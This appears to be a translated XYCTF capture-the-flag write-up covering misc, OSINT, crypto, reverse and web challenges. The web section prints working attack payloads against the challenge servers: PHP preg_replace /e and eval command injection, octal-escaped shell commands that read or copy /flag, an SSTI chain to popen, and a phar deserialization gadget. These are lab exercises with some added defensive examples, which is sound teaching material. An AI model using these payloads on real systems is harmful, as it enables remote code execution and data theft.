#n = 107803636687595025440095910573280948384697923215825513033516157995095253288310988256293799364485832711216571624134612864784507225218094554935994320702026646158448403364145094359869184307003058983513345331145072159626461394056174457238947423145341933245269070758238088257304595154590196901297344034819899810707
#c = 46049806990305232971805282370284531486321903483742293808967054648259532257631501152897799977808185874856877556594402112019213760718833619399554484154753952558768344177069029855164888168964855258336393700323750075374097545884636097653040887100646089615759824303775925046536172147174890161732423364823557122495
#list = [618066045261118017236724048165995810304806699407382457834629201971935031874166645665428046346008581253113148818423751222038794950891638828062215121477677796219952174556774639587782398862778383552199558783726207179240239699423569318, 837886528803727830369459274997823880355524566513794765789322773791217165398250857696201246137309238047085760918029291423500746473773732826702098327609006678602561582473375349618889789179195207461163372699768855398243724052333950197]

Brute-force a to get q (using a Cartesian product).

We know

h1 = a1*p + b1*q

h2 = a2*p + b2*q

and a1 and a2 are small, so after brute-forcing them we can compute

a2*h1 - a1*h2 = (a2*b1 - a1*b2) * q

which is a multiple of q; taking the gcd with n then yields q.

exp:

from Crypto.Util.number import *
from itertools import product
from math import gcd

n = 107803636687595025440095910573280948384697923215825513033516157995095253288310988256293799364485832711216571624134612864784507225218094554935994320702026646158448403364145094359869184307003058983513345331145072159626461394056174457238947423145341933245269070758238088257304595154590196901297344034819899810707
c = 46049806990305232971805282370284531486321903483742293808967054648259532257631501152897799977808185874856877556594402112019213760718833619399554484154753952558768344177069029855164888168964855258336393700323750075374097545884636097653040887100646089615759824303775925046536172147174890161732423364823557122495
list = [618066045261118017236724048165995810304806699407382457834629201971935031874166645665428046346008581253113148818423751222038794950891638828062215121477677796219952174556774639587782398862778383552199558783726207179240239699423569318, 837886528803727830369459274997823880355524566513794765789322773791217165398250857696201246137309238047085760918029291423500746473773732826702098327609006678602561582473375349618889789179195207461163372699768855398243724052333950197]
h1, h2 = list

# a1, a2 <= 2**8, so try every pair: a2*h1 - a1*h2 is a multiple of q, and gcd with n isolates it
for a, b in product(range(2**8), repeat=2):
    q = gcd(a * h1 - b * h2, n)
    if q != 1 and q < n:
        print(q, n)
        break
q = 12951283811821084332224320465045864899191924765916891677355364529850728204537369439910942929239876470054661306841056350863576815710640615409980095344446711

p = n // q
e = 65537
d = pow(e, -1, (p - 1) * (q - 1))
m = pow(c, d, n)
print(long_to_bytes(m))
#game_over

Extracting gives:

你相信我吗.txt

Is there really something in the picture inside the archive? Better look outside instead.

So we're being told not to analyse the picture; it probably holds nothing. Analyse the archive instead! After trying many approaches with no luck, look at the file name again: 我们的小秘密 (our little secret)? OurSecret? Trying it, that feels right. The password is game_over.

[screenshot]

Separating out flag.txt gives:

_nine_turns?}

end

Joining the nine flag fragments:

XYCTF{T3e_c0mb1nation_0f_crypt0_and_misc_1s_re6lly_fun!!L1u_and_K1cky_Mu_3re_so_sm4rt!In_just_a_few_m1nutes_they_were_thr0ugh!Sm3rt_y0u_can_do_nine_turns?}

MD5 the result for the final flag:

XYCTF{b1bdc6cf06a28b97c91c1c12f0d3bc00}

取证缝合怪 (Forensics patchwork)

Extraction password: 34791fbc-4d71-4a09-9408-a28907fa5435

The evidence is a VirtualBox virtual machine. The author's VirtualBox version is 7.0.14.

Try booting it in VirtualBox?

Several of this VM's settings were changed. Which ones?

Osint1

Someone is out and about again; can you catch him?
flag format: xyctf{xxx省|xxx市|xxx路|xx海}

Since it already says xx province, xx city, don't go thinking about over there.

Use the names from Amap (高德地图) first!

[screenshot]

xyctf{江苏省|南通市|滨海南路|黄海}

Osint2

Poor little 南梁 has gone out to play yet again; go catch him!!!!
flag hint: xyctf{train number|xxxx province|xxxx (scenic spot name, fewer than 6 characters)}
Final format: xyctf{xxxxxx|xxxxx|xxxxxx}

Timing: finished at the scenic spot and about to head back.

Look up the train on 12306 by date, station name and time.

The Fuxing high-speed train to Luzhou leaving at exactly 3:10 is G3293; the province is Henan. 龙门石窟 (Longmen Grottoes) was rejected as the scenic spot, but the well-known 老君山 (Laojun Mountain) was accepted.

xyctf{G3293|河南省|老君山}

EZ_Base1024*2

מಥൎࢺଳɫअΥٻଯԢڥիɺ୦ࢸЭਘמۊիɎඥࡆڣߣಷܤҾয౽5

https://nerdmosis.com/tools/encode-and-decode-base2048

It's base2048.

XYCTF{84ca3a6e-3508-4e34-a5e0-7d0f03084181}

Ez_osint

An electronic love letter with no other information; all we can do is analyse it.

Stegsolve reveals a website watermark: www.hi2future.com

[screenshot]

Browsing all the public letters, we find one posted by liu, one of the challenge authors.

https://www.hi2future.com/Mail/showitem/id/673413

But it is a fake flag (in fact "Now you see me, but soon you won't." is the Mirage Tank's line from Red Alert, and "mirage tank" is exactly the steganography used on the picture above).

Using the page field in the URL and binary-searching by time, the letter from the picture turns up at around page 4000-odd; the flag is in the comments (which have already turned into an argument).

https://www.hi2future.com/Mail/showitem/id/494468?page=1

XYCTF{2fb65b60505cf6a9243661ce79431e7a}

失败的人生 (A failed life)

CDM258 successfully fell to corruption after the 227th failure. A failed life, a failed person.

The attachment has been updated; some key data is hinted at in the description. Wishing you all a successful life.

美妙的歌声 (A beautiful song)

Can this song deeply touch you?

The spectrogram shows the password:

XYCTF_1s_w3ll

[screenshot]

"Deeply touch you" points to DeepSound.

[screenshot]

XYCTF{T0uch_y0ur_he3rt_d55ply!!}

又是个签到 (Another sign-in)

Maybe you can sign in in the QQ group.

asrmorfe.txt

😸🙍👭🙅🙇👔🙊👙👺🙂👌👪😫🙈😰😳🙃🙃🙄🙊🙎👐😱🙆👮👡👚👷😵👫🙇👏🙊👲😶👤🙉👫😰😷👹🙇👨👸👓👏🙋🙋👲🙈👳😲🙎👭👨🙉😰👰👙🙇👑👸👦🙎🙊👹🙊👮👗👩🙁😹🙃👧👡👸🙁😱👤👩👣👷👕🙅👨👙👗🙄👵👐👡👢😫😸👔😳👤👬😵😯👦👱😵👭🙎🙂🙃👓😲👐👶👥😷👰😵😹😷👘👗👪👬👥👬👒👱👰😶👕👳😵😯🙇👺😳👹😱😰👵🙉🙁😽😽
签到.txt

HWXj+kI2pS+5pSJhDS0oAzlQmziosSr7gUvdXppjSt8BNUTz8oLfE57NkCrVwBBgGul5hHzCcKqyG7U5LWMOXYtzloMsVvdZdPbMZyb+EgYF17+W/S1oLDgQcjGmP6CSHWXj+kI2pS+5pSJhDS0oA3fVDcJt/sEYpz9U0yQTrgxTN0kF5G4xTJ5IKqYil2gK3Ml6usGZsucJXa6pCovoeaGSyZNq6T3aX1NOlb5Gt4gF17+W/S1oLDgQcjGmP6CSHWXj+kI2pS+5pSJhDS0oAzlQmziosSr7gUvdXppjSt8PPIU/UwIkvINgvGw+oQMCCaOmO7bDsiSxD/r9w3RKRQEfMm/fv+a/5v/NWgauEpoF17+W/S1oLDgQcjGmP6CSHWXj+kI2pS+5pSJhDS0oA2QV+Gu05V1J2eVrbGhHB487Ns8HTVNYrll8P/Xve17NCaOmO7bDsiSxD/r9w3RKRQEfMm/fv+a/5v/NWgauEpoF17+W/S1oLDgQcjGmP6CS1yISnL45ZHzPjs5BGSboyDJXscweSL6g0ptOqql5vhY7Ns8HTVNYrll8P/Xve17NlyvQj9HulYK3sIMIiNTVrv/QYgLgLF9uO3y6uH800Gy0VvmX5a5S5ZEDlkBSgVrDb/KxZEoU9d83Nbzm7yH80p9xX+50C/29uVc+H6gx1gOTPv9mT6A8qfJoby4BoCS3by65j7WFf6d/XZX0KskX4t1SAjnDpnC8qWVbU6l6Zs9zWhqP0E6UVZEUMUcRZB43hzoYB6fvcRSs8WPoArwl6dY0JrIccPz30xmtzuOLZRKpeJ5IPHFZw5l6Zo68xW/fiYggRz/KqtgFCLvPQ+Lj+6YY1X0zgl8a3xzz5EI9efUoZd30RstP6oPDy17QzTwoaA1OLHZfyIntyJiT9r3x0kLELrvwIFczyH339IGVYqE4qA/Xsd3t/I+jStXiGGCnKCWoqABdtqk7Z22cIzn0lPAiqi9i3hd/IIgrlkygiofpTmBc34UjLRWWFjQgmDQZ8em1hDlVfgd+/93D4BVIn36xgcg2RtYCx2GmXmg5JwRj5pxcBzyOVie5m0U4zHD6Rt0T8GAvCiCf9hhYkBi7lVHe4Sb7op9fpgfXrNunluSOwxS0NlaBKwa1gvE6/BNy2CI2Uv2y4jlPTdIuCNnWbCJsTSczfPJg5PVfyXykQtg4qA/Xsd3t/I+jStXiGGCnKCWoqABdtqk7Z22cIzn0lLw/priteJqeyg6psALOE5HEboNbEbOkupEDq1HXrfGn2CI2Uv2y4jlPTdIuCNnWbCJsTSczfPJg5PVfyXykQtg4qA/Xsd3t/I+jStXiGGCnctoLlIFVYoOgnQM/2Rz5g4eIxaKQoZ+9cRB51n5yxl/BJQA5860fCnVVFSyvS40JdaogrK4AcB+C0gsnUbXVyeX1Kq+MwIHo812Z/0GIAiR+HkJQwgmO7qkogz1vcP4+q7EHUnfXquRurKvZ5jMHz4eIxaKQoZ+9cRB51n5yxl9g/v4Djdoq+YadpY2vIGrZ2CI2Uv2y4jlPTdIuCNnWbDVfnXQwmbz3jY+JyZm4sKgHDLAxJSG/IIAKk2q5C0f6l6L6v86Nra6TiDC3FBOzBEMzapQz6v9XkJfLFhywMtFLbz4PXsEvXiaFbSooHN8xVDDfRmWQyINRSNJguwiY9ElfGZnb6gHT2U5ENwxhxpxW+5Jnwn3zMCBub7HDwqyOSl5l8hKoU5obcdof5SuB3A==

asrmorfe reversed reads "e from rsa".

e = 65537

https://txtmoji.com/

[screenshot]

432000023200001320000211000003200004320000313000021100001130000113000034200003320000

Looking at the string, each chunk ends in four 0s with three changing digits in front, so clearly groups of 7, ASCII-like; the digit range points to base 5. Compute:

4320000 2320000 1320000 2110000 0320000 4320000 3130000 2110000 1130000 1130000 3420000 3320000
strs = "432000023200001320000211000003200004320000313000021100001130000113000034200003320000"

# each 7-digit group is one character written in base 5, most significant digit first
for i in range(len(strs) // 7):
    num = strs[7 * i:7 * i + 7]
    n = 0
    for j in range(7):
        n = n + int(num[-(j + 1)]) * (5 ** j)
    print(chr(n), end="")

The output is garbage, but there is clearly a result; try reversing the ciphertext:

s = "432000023200001320000211000003200004320000313000021100001130000113000034200003320000"
strs = s[::-1]  # reverse the whole digit string first, then decode the 7-digit base-5 groups
for i in range(len(strs) // 7):
    num = strs[7 * i:7 * i + 7]
    n = 0
    for j in range(7):
        n = n + int(num[-(j + 1)]) * (5 ** j)
    print(chr(n), end="")
# DIQQ SEA BCE

Read backwards, the result is there: ECB AES QQID

So it is AES in ECB mode, and QQID should be the key. From the challenge description, the QQ group ID is 798794707.

https://the-x.cn/cryptography/Aes.aspx

[screenshot]

The decryption ends with a hint: Have you heard of Malbolge?

https://malbolge.doleczek.pl/

[screenshot]

XYCTF{It’s_Easy!_Special_Signature}

WEB

ezhttp

A very ez http.

[screenshot]

Scan with dirsearch:

[screenshot]

Visit /robots.txt:

User-agent: *
Disallow: /l0g1n.txt

Visit /l0g1n.txt:

username: XYCTF
password: @JOILha!wuigqi123$

Request headers and POST body:

User-Agent: XYCTF
Origin: http://xyctf.top:49206
client-IP: 127.0.0.1
via: ymzx.qq.com
Cookie: XYCTF

password=%40JOILha%21wuigqi123%24&username=XYCTF

warm up

Just woke up and not in the mood for challenges; warm up with something simple first.

<?php
include 'next.php';
highlight_file(__FILE__);
$XYCTF = "Warm up";
extract($_GET);

if (isset($_GET['val1']) && isset($_GET['val2']) && $_GET['val1'] != $_GET['val2'] && md5($_GET['val1']) == md5($_GET['val2'])) {
    echo "ez" . "<br>";
} else {
    die("什么情况,这么基础的md5做不来");
}

if (isset($md5) && $md5 == md5($md5)) {
    echo "ezez" . "<br>";
} else {
    die("什么情况,这么基础的md5做不来");
}

if ($XY == $XYCTF) {
    if ($XY != "XYCTF_550102591" && md5($XY) == md5("XYCTF_550102591")) {
        echo $level2;
    } else {
        die("什么情况,这么基础的md5做不来");
    }
} else {
    die("学这么久,传参不会传?");
}

什么情况,这么基础的md5做不来

?val1[]=1&val2[]=2&md5=0e215962017&XYCTF=QNKCDZO&XY=QNKCDZO

[screenshot]

<?php
highlight_file(__FILE__);
if (isset($_POST['a']) && !preg_match('/[0-9]/', $_POST['a']) && intval($_POST['a'])) {
    echo "操作你O.o";
    echo preg_replace($_GET['a'],$_GET['b'],$_GET['c']); // I won't set up ten-odd levels like other people do
} else {
    die("有点汗流浃背");
}

有点汗流浃背

/LLeeevvveeelll222.php?a=/abc/e&b=system('cat /flag')&c=/abc/e

POST:
a[]=1

[screenshot]

牢牢记住,逝者为大 (Remember well: the departed come first)

牢大 is on a helicopter that is about to crash; can you save him within the limited operations?

If the flag file is empty, restart the instance; if it hasn't worked after two tries, your payload is wrong.

<?php
highlight_file(__FILE__);
function Kobe($cmd)
{
    if (strlen($cmd) > 13) {
        die("see you again~");
    }
    if (preg_match("/echo|exec|eval|system|fputs|\.|\/|\\|/i", $cmd)) {
        die("肘死你");
    }
    foreach ($_GET as $val_name => $val_val) {
        if (preg_match("/bin|mv|cp|ls|\||f|a|l|\?|\*|\>/i", $val_val)) {
            return "what can i say";
        }
    }
    return $cmd;
}

$cmd = Kobe($_GET['cmd']);
echo "#man," . $cmd . ",manba out";
echo "<br>";
eval("#man," . $cmd . ",mamba out");

#man,,manba out

Use $_GET[c] to get around the length limit on cmd:

?cmd=%0d`$_GET[c]`;%23&c=cp /flag nn

This copies /flag into nn; the file nn is created in the current directory.

But the letters of "flag" are filtered as well (see the second regex), so write the words in octal to get past the filter, with spaces written as +:

?cmd=%0d`$_GET[c]`;%23&c=$'\143\160'+$'\57\146\154\141\147'+$'\156\156'

Then visit nn to download it.

XYCTF{268b1b1b-dae0-4800-8db4-10eca0a59efb}

ez!Make

[screenshot]

ezmake

Makefiles seem… pretty simple, right? _xwx

Directly visiting /flag downloads the flag.

Intended solution:

source flag, or echo $(shell cat flag)

ez?Make

Is it really… simple? ...@xa$<x{w_x

RCE filter bypass:

sort `echo 2F666c6167 | xxd -r -p`

[screenshot]

Or:

cd ..&&cd ..&&cd ..&&cd ..&&cd bin&&echo "Y2F0IC9mbGFn"|b[!b-z]se64 -d|b[!bz]sh

εZ?¿м@Kε¿?

Μακεϝ1LE>1s<S0<ϜxxΚ1ηG_ξ2!@<>#>%%#!$*&^(!

连连看到底是连连什么看 (Match-match: what exactly are we matching?)

What exactly do we need to match? (The flag is at /flag in the root directory.)

我是一个复读机 (I am a parrot)

I'm a parrot that only speaks English.

The login username is admin.

The dictionary is in the attachment.

[screenshot]

admin, password asdqwe

An SSTI challenge; use the special characters ﹛﹜ to bypass the filter on {}.

Payload:

?sentence=﹛(()|attr(request.values.a)|attr(request.values.b)|attr(request.values.c)()|attr(request.values.d)(132)|attr(request.values.e)|attr(request.values.f)|attr(request.values.d)(request.values.g)(request.values.h)).read()﹜&a=__class__&b=__base__&c=__subclasses__&d=__getitem__&e=__init__&f=__globals__&g=popen&h=cat /flag

[screenshot]
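Why the small-form brackets got past the filter, and how to stop it, as an added example that is not part of the original writeup or the challenge's code: a blocklist that tests only the ASCII characters `{` and `}` never sees ﹛ (U+FE5B), but NFKC normalisation folds such compatibility forms back to ASCII before the check; `fold`, `naive_filter_passes` and `hardened_filter_passes` are my own names. The durable fix is still to hand user text to the template as a variable instead of rendering it as template source.

```python
# Added example (not from the original writeup): a blocklist on the ASCII braces
# misses look-alike characters; Unicode NFKC normalisation before the check closes
# that gap for compatibility forms such as U+FE5B (small) and U+FF5B (fullwidth).
import unicodedata

BLOCKED = "{}"
# the payload shape used above, shortened; \ufe5b and \ufe5c are the small curly brackets
PAYLOAD = "\ufe5b(()|attr(request.values.a)).read()\ufe5c"


def fold(text):
    """NFKC maps compatibility variants (small, fullwidth, ...) onto their canonical ASCII."""
    return unicodedata.normalize("NFKC", text)


def naive_filter_passes(sentence):
    """Challenge-style check: only the literal ASCII braces are rejected."""
    return not any(ch in sentence for ch in BLOCKED)


def hardened_filter_passes(sentence):
    """Normalise first, then block; additionally accept only printable ASCII, which is all
    an 'English-only parrot' needs and keeps unmapped look-alikes out as well."""
    folded = fold(sentence)
    if any(ch in folded for ch in BLOCKED):
        return False
    return all(0x20 <= ord(ch) < 0x7F for ch in folded)


if __name__ == "__main__":
    print(naive_filter_passes(PAYLOAD))      # True  -> the bypass works
    print(hardened_filter_passes(PAYLOAD))   # False -> caught after folding
    print(fold("\ufe5b\ufe5c"))             # {}
```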

ezmd5

Was md5 the first PHP topic you learned?

Only jpg uploads are accepted.

https://www.win.tue.nl/hashclash/

Create a jpg, then run fastcoll_v1.0.0.5.exe 1.jpg

which generates:

[screenshot]

Upload them:

[screenshot]

ezRCE

If you run into an RCE this ez, count yourself lucky.

<?php
highlight_file(__FILE__);
function waf($cmd){
    $white_list = ['0','1','2','3','4','5','6','7','8','9','\\','\'','$','<'];
    $cmd_char = str_split($cmd);
    foreach($cmd_char as $char){
        if (!in_array($char, $white_list)){
            die("really ez?");
        }
    }
    return $cmd;
}
$cmd=waf($_GET["cmd"]);
system($cmd);

really ez?

The trick is the octal bypass: bash's $'...' quoting decodes the escape sequences inside it according to the form they are written in.

cat /flag

?cmd=$'\143\141\164'<$'\57\146\154\141\147'
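Both payloads above (this one and the one for 牢牢记住) hide filtered words behind bash's ANSI-C quoting, where $'\143\141\164' is decoded to cat before execution. As an added example that is not part of the original writeup, here is the reverse transformation a log reviewer or WAF rule would apply so the real command becomes visible; `expand_ansi_c`, `deobfuscate_shell` and `hits_blocklist` are my own names, and the blocklist words are taken from the two challenges' filters.

```python
# Added example (not from the original writeup): undo bash ANSI-C quoting ($'...') so a
# command captured in logs shows the words the octal escapes were hiding. Handles octal
# (\ooo) and hex (\xHH) escapes plus the '+' that form-encoding uses for spaces.
import re
from urllib.parse import unquote_plus

_SIMPLE_ESCAPES = {"n": "\n", "t": "\t", "r": "\r", "a": "\a", "\\": "\\", "'": "'", '"': '"'}
_ANSI_C_QUOTE = re.compile(r"\$'((?:\\.|[^'\\])*)'")


def expand_ansi_c(body):
    """Expand the escapes inside one $'...' body the way bash does before running it."""
    out = []
    i = 0
    while i < len(body):
        if body[i] != "\\" or i + 1 == len(body):
            out.append(body[i])
            i += 1
            continue
        rest = body[i + 1:]
        m = re.match(r"[0-7]{1,3}", rest)
        if m:                                   # octal: \143 -> 'c'
            out.append(chr(int(m.group(), 8) & 0xFF))
            i += 1 + len(m.group())
            continue
        m = re.match(r"x([0-9a-fA-F]{1,2})", rest)
        if m:                                   # hex: \x63 -> 'c'
            out.append(chr(int(m.group(1), 16)))
            i += 1 + len(m.group())
            continue
        out.append(_SIMPLE_ESCAPES.get(rest[0], rest[0]))
        i += 2
    return "".join(out)


def deobfuscate_shell(cmd, form_encoded=True):
    """Return cmd with every $'...' word replaced by its literal text.

    form_encoded=True first applies URL form decoding, so '+' becomes a space as it does
    when the payload arrives in a query string.
    """
    if form_encoded:
        cmd = unquote_plus(cmd)
    return _ANSI_C_QUOTE.sub(lambda m: expand_ansi_c(m.group(1)), cmd)


# words the two challenge filters were trying to keep out of the command
FILTERED = ("flag", "cat", "cp", "ls", "bin")


def hits_blocklist(cmd):
    """Filtered words present once the quoting tricks are undone."""
    plain = deobfuscate_shell(cmd).lower()
    return [w for w in FILTERED if w in plain]


if __name__ == "__main__":
    ezrce = "$'\\143\\141\\164'<$'\\57\\146\\154\\141\\147'"
    laoda = "$'\\143\\160'+$'\\57\\146\\154\\141\\147'+$'\\156\\156'"
    print(deobfuscate_shell(ezrce))   # cat</flag
    print(deobfuscate_shell(laoda))   # cp /flag nn
    print(hits_blocklist(laoda))      # ['flag', 'cp']
```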

pharme

do you know phar?

Generate the phar archive:

<?php
class evil{
    public $cmd;
    public $a;
}
$evilClass = new evil();
$evilClass->cmd = 'system(next(getallheaders()));__halt_compiler();';
$a = new SplStack();
$a -> push($evilClass);

$phar = new Phar("phar123.phar"); // the extension must be phar
$phar->startBuffering();
$phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>"); // set the stub
$phar->setMetadata($a); // store the custom meta-data in the manifest
$phar->addFromString("test.txt", "test"); // add a file to the archive
$phar->stopBuffering();
?>

CRYPTO

factor1

Why is e even bigger than n?

import gmpy2
import hashlib
from Crypto.Util.number import *

p = getPrime(512)
q = getPrime(512)
d = getPrime(512)
e = gmpy2.invert(d, (p**3 - 1) * (q**3 - 1))
flag = "XYCTF{" + hashlib.md5(str(p + q).encode()).hexdigest() + "}"
print(e)
print(p * q)
# 172005065945326769176157335849432320425605083524943730546805772515111751580759726759492349719668775270727323745284785341119685198468883978645793770975366048506237371435027612758232099414404389043740306443065413069994232238075194102578269859784981454218948784071599231415554297361219709787507633404217550013282713899284609273532223781487419770338416653260109238572639243087280632577902857385265070736208291583497988891353312351322545840742380550393294960815728021248513046077985900158814037534487146730483099151396746751774427787635287611736111679074330407715700153025952858666841328055071403960165321273972935204988906850585454805923440635864200149694398767776539993952528995717480620593326867245714074205285828967234591508039849777840636255379730281105670496110061909219669860172557450779495125345533232776767292561378244884362014224844319802810586344516400297830227894063759083198761120293919537342405893653545157892446163
# 99075185389443078008327214328328747792385153883836599753096971412377366865826254033534293886034828804219037466246175526347014045811852531994537520303063113985486063022444972761276531422538694915030159420989401280012025249129111871649831185047820236417385693285461420040134313833571949090757635806658958193793
# -*- coding: utf-8 -*-

import gmpy2
import libnum
import hashlib
import random


def continuedFra(x, y):
cf = []
while y:
cf.append(x // y)
x, y = y, x % y
return cf


def gradualFra(cf):
numerator = 0
denominator = 1
for x in cf[::-1]:
numerator, denominator = denominator, x * denominator + numerator
return numerator, denominator


def solve_pq(a, b, c):
par = gmpy2.isqrt(b * b - 4 * a * c)
return (-b + par) // (2 * a), (-b - par) // (2 * a)


def getGradualFra(cf):
gf = []
for i in range(1, len(cf) + 1):
gf.append(gradualFra(cf[:i]))
return gf


def wienerAttack(e, n):
cf = continuedFra(e, n)
gf = getGradualFra(cf)
for d, k in gf:
if k == 0: continue
if (e * d - 1) % k != 0:
continue
phi = (e * d - 1) // k
p, q = solve_pq(1, n - phi + 1, n)
if p * q == n:
return d


e = 172005065945326769176157335849432320425605083524943730546805772515111751580759726759492349719668775270727323745284785341119685198468883978645793770975366048506237371435027612758232099414404389043740306443065413069994232238075194102578269859784981454218948784071599231415554297361219709787507633404217550013282713899284609273532223781487419770338416653260109238572639243087280632577902857385265070736208291583497988891353312351322545840742380550393294960815728021248513046077985900158814037534487146730483099151396746751774427787635287611736111679074330407715700153025952858666841328055071403960165321273972935204988906850585454805923440635864200149694398767776539993952528995717480620593326867245714074205285828967234591508039849777840636255379730281105670496110061909219669860172557450779495125345533232776767292561378244884362014224844319802810586344516400297830227894063759083198761120293919537342405893653545157892446163
n = 99075185389443078008327214328328747792385153883836599753096971412377366865826254033534293886034828804219037466246175526347014045811852531994537520303063113985486063022444972761276531422538694915030159420989401280012025249129111871649831185047820236417385693285461420040134313833571949090757635806658958193793

d = wienerAttack(e, n ** 3)  # d was inverted modulo (p^3-1)(q^3-1), which is close to n^3, so Wiener runs against n^3 instead of n

print('d=', d)
d = 8447122254265361577759220083550460887840558233627984117576685838469227480934556534673167325385487344741530262745308367064419215281251764917289925433582347

e = 172005065945326769176157335849432320425605083524943730546805772515111751580759726759492349719668775270727323745284785341119685198468883978645793770975366048506237371435027612758232099414404389043740306443065413069994232238075194102578269859784981454218948784071599231415554297361219709787507633404217550013282713899284609273532223781487419770338416653260109238572639243087280632577902857385265070736208291583497988891353312351322545840742380550393294960815728021248513046077985900158814037534487146730483099151396746751774427787635287611736111679074330407715700153025952858666841328055071403960165321273972935204988906850585454805923440635864200149694398767776539993952528995717480620593326867245714074205285828967234591508039849777840636255379730281105670496110061909219669860172557450779495125345533232776767292561378244884362014224844319802810586344516400297830227894063759083198761120293919537342405893653545157892446163

k = e * d - 1  # a multiple of (p^3-1)(q^3-1) and hence of (p-1)(q-1): split n from it as when factoring RSA given d

r = k
t = 0
while True:
r = r // 2
t += 1
if r % 2 == 1:
break

success = False

for i in range(1, 101):
g = random.randint(0, n)
y = pow(g, r, n)
if y == 1 or y == n - 1:
continue

for j in range(1, t):
x = pow(y, 2, n)
if x == 1:
success = True
break
elif x == n - 1:
continue
else:
y = x

if success:
break
else:
continue

if success:
p = libnum.gcd(y - 1, n)
q = n // p
print('P: ' + '%s' % p)
print('Q: ' + '%s' % q)
hash_result = hashlib.md5(str(p + q).encode()).hexdigest()

print(b'XYCTF{' + hash_result.encode() + b'}')
else:
print('Cannot compute P and Q')
d= 8447122254265361577759220083550460887840558233627984117576685838469227480934556534673167325385487344741530262745308367064419215281251764917289925433582347
P: 10754959493573546439510276829300246769373124436128170955050379041986504869221750743052397622171703140881050431144683659643071578143360949942206693325622779
Q: 9212046353930376594996890089494718736894378991991381248242532319628627449681664076081705664941905594411935750003102856235503684466394327681725704255564467
b'XYCTF{a83211a70e18145a59671c08ddc67ba4}'
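As an added example (not the writeup's script), the same two steps on a constructed toy instance so each can be checked end to end: e is the inverse of d modulo (p^3-1)(q^3-1), which is about the size of n^3, so Wiener's continued-fraction attack is run against n^3, and the recovered d then splits n because e*d - 1 is a multiple of (p-1)(q-1). The primes P, Q and the exponent D below are constructed values, not the challenge's.

```python
from math import gcd, isqrt

def convergents(x, y):  # yield the convergents (h, k) of the continued fraction of x/y
    h_prev, h, k_prev, k = 0, 1, 1, 0
    while y:
        a = x // y
        x, y = y, x - a * y
        h_prev, h = h, a * h + h_prev
        k_prev, k = k, a * k + k_prev
        yield h, k

def wiener(e, m):
    """Recover d when e*d = 1 mod phi for a hidden phi close to m.  With m = N^3 and
    phi = (p^3-1)(q^3-1), m - phi + 1 = p^3 + q^3, so phi must split m in two."""
    for k, d in convergents(e, m):
        if k == 0 or (e * d - 1) % k:
            continue
        s = m - (e * d - 1) // k + 1          # candidate p^3 + q^3
        disc = s * s - 4 * m
        if disc < 0: continue
        r = isqrt(disc)
        if r * r == disc and ((s + r) // 2) * ((s - r) // 2) == m:
            return d
    return None

def factor_from_d(e, d, n, bases=range(2, 64)):
    """Split n = p*q from e*d - 1, a multiple of lcm(p-1, q-1)."""
    k, t = e * d - 1, 0
    while k % 2 == 0:
        k, t = k // 2, t + 1
    for g in bases:
        y = pow(g, k, n)
        for _ in range(t):
            x = pow(y, 2, n)
            if x == 1 and y not in (1, n - 1):   # nontrivial square root of 1 mod n
                p = gcd(y - 1, n)
                return min(p, n // p), max(p, n // p)
            y = x
    return None

# Constructed toy instance (not the challenge's numbers): 7-digit primes, 17-bit d.
P, Q = 1000003, 1000033
N = P * Q
M = (P**3 - 1) * (Q**3 - 1)            # the modulus the challenge inverted d against
D = 65537
while gcd(D, M) != 1: D += 2           # keep d invertible, as getPrime() would
E = pow(D, -1, M)                      # ~3x the bit length of N, just like the challenge's e

def recover(e, n):  # both steps of the writeup: Wiener against n^3, then split n from e*d - 1
    d = wiener(e, n ** 3)
    return (d,) + factor_from_d(e, d, n)
```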

REVERSE

聪明的信使 (The Clever Messenger)

Traditional encryption, no one gets cheated.

Open it in IDA

image-20240401164239741

The encryption logic is as follows

int __cdecl main(int argc, const char **argv, const char **envp)
{
char Str1[100]; // [esp+18h] [ebp-68h] BYREF
int v5; // [esp+7Ch] [ebp-4h]

__main();
v5 = 9;
printf("Input your flag:");
scanf("%s", Str1);
encrypt(Str1, v5);
if ( !strcmp(Str1, "oujp{H0d_TwXf_Lahyc0_14_e3ah_Rvy0ac@wc!}") )
printf("Good job!");
else
printf("Try again!");
return 0;
}

The shift is 9, so shifting each letter back by 9 recovers the flag:

flag{Y0u_KnOw_Crypt0_14_v3ry_Imp0rt@nt!}

喵喵喵的flag碎了一地 (Meow's flag is shattered all over the floor)

喵喵喵的flag碎了一地>miaomiaomiao.exe
Hint:
1. Open in IDA and Learn about `Strings` to find the first part of the flag
2. Learn about `Functions` to find the second part of the flag which is the name of a function
3. The hint for the last part is in the function you found in the second part

The main function tells you that the first part is in the strings,

the second part is in a function name,

and the hint for the third part is in the function found for the second part.

Shift+F12

image-20240402133728974

flag{My_fl@g_h4s_

Then, in the function list, there is

image-20240402135429080

br0ken_4parT_

image-20240402135754644

Entering the function gives the hint: Xref means cross-reference, i.e. where it is called; select the function name and press X to view its references

image-20240402135810125

image-20240402135823981

A piece of the flag is visible here, but this view does not show all of it

image-20240402140826056

Bu7_Y0u_c@n_f1x_1t!}

flag{My_fl@g_h4s_br0ken_4parT_Bu7_Y0u_c@n_f1x_1t!}

你是真的大学生吗? (Are you really a college student?)

Are you a hapless college student?

This is an assembly challenge, so it cannot be decompiled; read the assembly code